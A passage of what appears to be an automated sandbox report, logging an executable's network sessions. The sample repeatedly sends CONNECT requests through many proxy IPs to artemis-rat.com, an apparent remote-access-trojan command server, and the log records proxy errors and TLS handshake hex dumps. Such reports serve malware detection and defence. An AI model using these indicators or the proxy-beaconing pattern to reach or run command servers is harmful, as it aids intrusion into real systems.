                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.996361971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.695261002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.424063921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            489192.168.2.55137120.205.61.14381233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.450647116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.802757978 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            490192.168.2.55135452.67.10.183803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.450649023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.826700926 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.972587109 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c ce a8 9e e0 18 01 1c f7 71 80 06 21 ff 17 dc ce a5 ca d4 64 ef e3 a7 ce 53 66 f0 30 18 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: elq!dSf0*,+0/$#('=<5/Uartemis-rat.com#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.296207905 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 61 3a a3 f9 16 f1 05 05 78 3a 28 2a f4 9c c1 0d 63 48 82 eb 2c cd 73 45 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                                                                                                                                                                                            Data Ascii: =9a:x:(*cH,sEDOWNGRD0000*H010Uartemis-rat.com0240311015326Z260311015326Z010Uartemis-rat.com0"0*H0RS
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.313513041 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 0e dc 77 c6 bd 63 14 b4 b5 96 d1 f6 f5 5e ab 15 4a 9a b7 2f f2 87 39 de f7 e3 2c 9a fa 77 a8 47 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 5f a0 1f 90 71 aa ae b4 f4 0e 02 a3 37 a1 18 a0 82 ca 56 ab 41
                                                                                                                                                                                                                                                            Data Ascii: %! wc^J/9,wG(_q7VAdqo$r
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.633948088 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 29 57 d9 c2 20 f9 87 7f 1c c3 27 cd b1 c9 33 61 37 c3 00 5c 5f e9 8a 5a 60 d9 a9 cb de a2 cb c1 1e ac 04 a3 fb 3e 46 81
                                                                                                                                                                                                                                                            Data Ascii: ()W '3a7\_Z`>F


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            491192.168.2.55130845.11.95.16660023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.451158047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.975069046 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            492192.168.2.551536104.16.207.86803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.451714993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.613049030 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            493192.168.2.551304190.103.177.131803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.452482939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.848870039 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            494192.168.2.550358103.155.54.26833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.463140965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.498764992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.126585007 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            495192.168.2.55042745.81.232.17543933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.472738981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.514400005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.608470917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.701935053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.714030981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            496192.168.2.551699202.159.35.334433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.473865032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            497192.168.2.551701202.159.35.334433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.475184917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            498192.168.2.551346203.95.196.5080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.475188017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            499192.168.2.551702202.159.35.334433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.477051020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            500192.168.2.551365176.123.56.5836293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.477087021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            501192.168.2.551703202.159.35.334433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.478712082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            502192.168.2.55140147.243.205.131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.484585047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            503192.168.2.55172446.22.210.1844433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.488595963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            504192.168.2.550487165.227.196.37567553876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.488977909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            505192.168.2.55172546.22.210.1844433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.490430117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            506192.168.2.55172746.22.210.1844433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.492278099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            507192.168.2.5514185.196.111.30200603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.493530035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            508192.168.2.55172946.22.210.1844433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.493813992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            509192.168.2.55173647.236.85.1134433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.497927904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            510192.168.2.55173847.236.85.1134433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.500246048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            511192.168.2.55174147.236.85.1134433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.501707077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            512192.168.2.55174347.236.85.1134433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.505003929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            513192.168.2.55146418.133.16.21803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.505156040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.839391947 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.974391937 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c ce a2 4f d3 20 bf c5 bd 45 05 28 6b 14 ac 27 4d 8d 3b 0f e6 40 94 b0 fb cd cf f8 08 f1 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: elO E(k'M;@*,+0/$#('=<5/Uartemis-rat.com#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.266354084 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 23 5e db 8a 87 3b cf 96 2e be 37 dc 46 45 fa c7 40 60 9f f6 b8 08 33 52 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                                                                                                                                                                                            Data Ascii: =9#^;.7FE@`3RDOWNGRD0000*H010Uartemis-rat.com0240311022309Z260311022309Z010Uartemis-rat.com0"0*H0eOvn0
